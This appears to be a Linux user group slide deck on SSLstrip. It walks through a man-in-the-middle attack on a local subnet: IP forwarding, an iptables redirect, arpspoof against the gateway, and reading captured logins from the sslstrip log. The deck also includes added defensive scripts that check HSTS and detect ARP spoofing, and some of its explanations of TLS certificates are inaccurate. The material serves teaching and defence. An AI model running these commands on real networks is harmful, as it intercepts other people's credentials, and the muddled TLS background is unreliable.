
SSLstrip


Presented by:
Brian Fields "AZ_RUNE"
<arizona.rune@gmail.com>
http://arizonarune.blogspot.com/

Brought to you by:
PLUG – Phoenix Linux User Group's Hackfest

Courtesy of:
Lisa Kachold <lisakachold@obnosis.com>
http://www.obnosis.com


Covered Topics:

What is SSLstrip?

How does it work?

What occurs when it is active?

What does it mean to network security?

Some steps to proactively defend against it.


What is SSLstrip

Before we can understand why and how to "strip"
something, we should know why and how it is
implemented.

What is SSL & TLS?

Where did SSL/TLS come from?

Why are SSL/TLS used?

How can secure protocols be built upon
insecure protocols?

What is SSL & TLS?

SSL stands for Secure Sockets Layer, though the
IETF (Internet Engineering Task Force) has
renamed it TLS (Transport Layer Security). TLS is
documented in RFC 2246 and identifies itself in the
protocol version field as SSL 3.1.

Where did SSL/TLS come from?

SSL was developed by Netscape, and is used
extensively by web browsers and crawlers to provide
secure connections for transferring sensitive data,
such as credit card numbers and login
credentials. An SSL-protected HTTP transfer
uses trusted port 443 (instead of HTTP's normal
port 80), and is identified with a special URL
scheme, "https". Thus, https://mail.google.com/
would cause an SSL-enabled browser to open a
secure SSL session to trusted port 443 at
mail.google.com.

Where did SSL/TLS come from?

"Trusted Ports?"
This is one of the first security patterns
implemented on the internet, via the "r" (remote)
programs. The idea is that all ports below 1024
were assigned ONLY to system processes. This
means remote connections were trusted because if
the source port was below 1024 it was a system process
and not a user/client. This applies at layer 4
("Transport") of the OSI model, and the protocols
involved were TCP and UDP. It should be noted
that this is an old security mechanism that has
since been replaced by modern encrypted protocols
such as SSH.

Why are SSL/TLS used?

In a word: cryptography. This is the foundation for
most modern security protocols. When an SSL
session is established, the server begins by
sending a non-encrypted public key to the client, so
both parties (and any eavesdropper) can read this
key. However, the client then transmits a random
46 bytes (based on PKCS) of data back to the
server in a way that no one else could decode. Only
the server, with its private key, can decode the
information to determine the 46 original bytes. This
shared secret is now used to generate a set of
cipher keys (based on RC4 or ARC4) to encrypt the
remainder of the session.

Why are SSL/TLS used?

(cont.)
These keys were embedded in authentication
certificates (called X.509 certificates), which allowed
a server to authenticate a client when the client
presented a certificate carrying its key.
Once the server verified that the two certificates
matched, authentication was complete.

Wait, if all this works so well, then why are we talking
about SSLstrip?


How can secure protocols be built upon
insecure protocols?

In a nutshell – they cannot be built upon them
without leaving a way for them to be circumvented.

This is where SSLstrip comes into use, combined with a MITM
(Man In The Middle) attack after gaining a foothold on a chosen
subnet.

By the way, almost all of you have been the victim of a
spoofing attack. Oh yes, and they were legal
attacks, 100% legal!


How does it work?


How does it work?

The picture does a decent job of explaining the flow
of how SSLstrip works. In the next few slides I
will explain how this works step by step, and at the
end there is an embedded mp4 going over the
concepts discussed in the coming slides.


What occurs when it is active?

First, there are some requirements that have to be met if
we are to use SSLstrip.

An Internet Connection

Victim has to be on the same subnet

A Linux computer

BT4 has the following features on a Live Disc.

SSLstrip http://www.thoughtcrime.org/software/sslstrip/

ARPspoof

Ettercap

(Ettercap is only necessary if you don't want
to run 'cat' on sslstrip.log)


What occurs when it is active?

Second, now that we have the requirements, we
have to have a victim on the same subnet.

In this example we have gained access to the
network and we are setting up shop to intercept SSL
traffic. Access could have been gained through a pen
test or through completely open access (i.e. wifi at a
university campus, Starbucks, etc.).

Now open a terminal.

Either change to root or be prepared to 'sudo' these
commands.

What occurs when it is active?

tar zxvf sslstrip-0.6.tar.gz

cd sslstrip-0.6

(optional) python ./setup.py install

If you have BT4 the next set of tools are already on
the live disk. Otherwise use your package manager
and install ettercap and dsniff (which contains arpspoof).

The IP address we will arpspoof in the demo video
is 172.16.30.132. The default gateway will be
172.16.30.2 and we will be acting as the default
gateway for this MITM (Man In The Middle) attack.

What occurs when it is active?

On to setup:

echo "1" > /proc/sys/net/ipv4/ip_forward

Turns the spoofing system into a router.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Tells all traffic on port 80 to head over to 8080, so
we can monitor all the information and strip SSL.

What occurs when it is active?

arpspoof -i eth0 -t 172.16.30.132 172.16.30.2

Allows our system to pose as any IP on the
local network by sending unsolicited ARP
responses. Once running, the victim's ARP cache will say the
default gateway is "our" MAC address.

python ./sslstrip.py -a -l 8080

-a tells sslstrip to log all SSL and HTTP
traffic.

-l 8080 tells it to listen on port 8080.

What occurs when it is active?

At this point our system is logging traffic and we can
still browse the web, for example:
http://www.example.com/
However, if we go to Gmail and check the address
bar we will notice that what should have been https is
only http. Try logging into mail with a dummy login
and password. While you won't get in, it will log the
info you used in the attempt.

Dummy login: pauldotcom12345

Dummy password: password12345
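The downgrade just described only succeeds because the victim's browser follows the plain-http links the proxy rewrites, and because the site answers on port 80 at all. An added defensive check (not part of the original slides or the SSLstrip project): the script below inspects a host's port-80 answer and its HTTPS response headers for an https:// redirect and a Strict-Transport-Security (HSTS) header. With HSTS cached, a browser that has visited the site before refuses a downgraded http:// URL outright. The sample responses are constructed, not captured from any real host.

```python
"""Check whether a site's HTTP responses let a browser be kept on plain HTTP.

Added example, not part of the original slides. Operates on already-captured
response headers (constructed sample data below) so it runs offline.
"""
from __future__ import annotations

from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class Response:
    """Minimal view of an HTTP response: the URL asked for, status, headers."""
    url: str
    status: int
    headers: dict[str, str]

    def header(self, name: str) -> str | None:
        """Case-insensitive header lookup."""
        for key, value in self.headers.items():
            if key.lower() == name.lower():
                return value
        return None


def hsts_max_age(value: str) -> int | None:
    """Parse the max-age directive out of a Strict-Transport-Security value."""
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        if name.strip().lower() == "max-age":
            try:
                return int(val.strip().strip('"'))
            except ValueError:
                return None
    return None


def assess(http_resp: Response, https_resp: Response, min_age: int = 31536000) -> list[str]:
    """Return findings that would let a stripping proxy keep a user on http://.

    An empty list means: port 80 redirects to https:// and the HTTPS response
    carries HSTS with a max-age of at least `min_age` seconds (one year here).
    """
    findings: list[str] = []

    location = http_resp.header("Location") or ""
    if not (300 <= http_resp.status < 400 and urlsplit(location).scheme == "https"):
        findings.append("plain-HTTP request is served directly instead of redirected to https://")

    hsts = https_resp.header("Strict-Transport-Security")
    if hsts is None:
        findings.append("no Strict-Transport-Security header on the HTTPS response")
    else:
        age = hsts_max_age(hsts)
        if age is None or age < min_age:
            findings.append(f"HSTS max-age {age} is below {min_age} seconds")
    return findings


# Constructed sample responses (hostnames are placeholders, not real sites).
GOOD_HTTP = Response("http://mail.example.com/", 301,
                     {"Location": "https://mail.example.com/"})
GOOD_HTTPS = Response("https://mail.example.com/", 200,
                      {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})

BAD_HTTP = Response("http://shop.example.com/", 200, {"Content-Type": "text/html"})
BAD_HTTPS = Response("https://shop.example.com/", 200, {"Content-Type": "text/html"})


if __name__ == "__main__":
    for label, pair in (("mail", (GOOD_HTTP, GOOD_HTTPS)), ("shop", (BAD_HTTP, BAD_HTTPS))):
        findings = assess(*pair)
        print(label, "OK" if not findings else "; ".join(findings))
```

The redirect check matters on its own: a site that serves a login form over port 80 gives the proxy a page to rewrite even before any https:// link is involved. The HSTS check is what closes the gap for returning visitors; a first visit over an attacked network is still exposed unless the host is on the browser's preload list.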

What occurs when it is active?

At this point we are going to check the log file to
see what has come up.

cat sslstrip.log | grep pauldotcom12345

When the log displays in the terminal you will see a
lot of different information. Keep looking, and you
will see the dummy login and password you used.

What does it mean to Network Security?

If you are a penetration tester, MITM attacks need to
be a tactic you are aware of, both to spot and to use.
Remember the legitimate use I mentioned earlier
for arpspoofing?

Educate your users about the things they need
to pay attention to on your network. Don't treat your users like new
users or that is all they will ever be. Be careful
trying to lock them down or you will likely find SSH
tunnels leaving your network.

Some steps to proactively defend against it.

If you are a penetration tester, remember that port
scanning and exploitation are not the only skills you need.
Learning how to creatively exploit what you gain
access to will allow you to plan better safeguards
and keep unwanted traffic out.

If your users are properly educated then they can be
an extra layer of security, because they will be
invested in the security of the network like you are.

Run regular checks and scans and read your logs.
Vigilance will pay off, for the lazy admin is the
hacked admin.
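One of those regular checks, as an added example that is not part of the original slides: the arpspoof step above works by making the victim's ARP cache say the default gateway lives at the attacker's MAC address. The script below parses snapshots of `arp -n`-style output (the table text is constructed, using the demo subnet from the slides and placeholder MAC addresses) and flags two indicators: the gateway's MAC differing from a known-good baseline, and one MAC answering for several IP addresses.

```python
"""Flag the default gateway's MAC address changing, an ARP-spoofing indicator.

Added example, not from the slides. Works on saved `arp -n` output so it runs
offline; the two snapshots below are constructed, not captured.
"""
import re
from collections import defaultdict

# Matches the data lines of Linux `arp -n`: "<ip>  ether  <mac>  <flags> ... <iface>".
ARP_LINE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+ether\s+([0-9a-f:]{17})", re.IGNORECASE)

# Baseline recorded on a quiet network (constructed; MACs are placeholders).
GATEWAY_IP = "172.16.30.2"
GATEWAY_MAC = "00:50:56:aa:bb:01"

BASELINE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
172.16.30.2              ether   00:50:56:aa:bb:01   C                     eth0
172.16.30.50             ether   00:0c:29:55:66:77   C                     eth0
172.16.30.140            ether   00:0c:29:de:ad:01   C                     eth0
"""

# Same host's table after another machine starts answering for the gateway.
POISONED = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
172.16.30.2              ether   00:0c:29:de:ad:01   C                     eth0
172.16.30.50             ether   00:0c:29:55:66:77   C                     eth0
172.16.30.140            ether   00:0c:29:de:ad:01   C                     eth0
"""


def parse_arp_table(text: str) -> dict:
    """Map IP -> MAC (lower-cased) from `arp -n` output; the header line is skipped."""
    table = {}
    for line in text.splitlines():
        match = ARP_LINE.match(line.strip())
        if match:
            table[match.group(1)] = match.group(2).lower()
    return table


def find_anomalies(table: dict, gateway_ip: str, expected_gateway_mac: str) -> list:
    """Return human-readable alerts; an empty list means the table looks clean."""
    alerts = []

    # 1. The gateway entry no longer matches the recorded baseline.
    gw_mac = table.get(gateway_ip)
    if gw_mac is not None and gw_mac != expected_gateway_mac.lower():
        alerts.append(f"gateway {gateway_ip} now resolves to {gw_mac}, expected {expected_gateway_mac}")

    # 2. One MAC claims more than one IP (a spoofing host keeps its own IP too).
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} answers for several IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for name, snapshot in (("baseline", BASELINE), ("poisoned", POISONED)):
        found = find_anomalies(parse_arp_table(snapshot), GATEWAY_IP, GATEWAY_MAC)
        print(name, "clean" if not found else "\n  " + "\n  ".join(found))
```

In practice the baseline MAC comes from the switch or router configuration rather than from a snapshot taken on the same network, since a snapshot taken while the cache is already poisoned would bless the attacker's address. The duplicate-MAC rule has benign hits too (a router with several interfaces, VRRP), so it is a prompt to look, not a verdict.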


Thanks to Pauldotcom.com for this demo:

Below is the embedded mp4 file.

If it won't play, go to:

http://www.youtube.com/watch?v=xWBeQ0cR0WY

Reference Sources / Bibliography


Freesoft.org
http://www.freesoft.org/CIE/Topics/146.htm
http://www.freesoft.org/CIE/Topics/121.htm

IETF – Internet Engineering Task Force
http://www.ietf.org

Moxie Marlinspike
http://www.thoughtcrime.org/software/sslstrip/

Wikipedia
http://en.wikipedia.org/wiki/ARP_spoofing
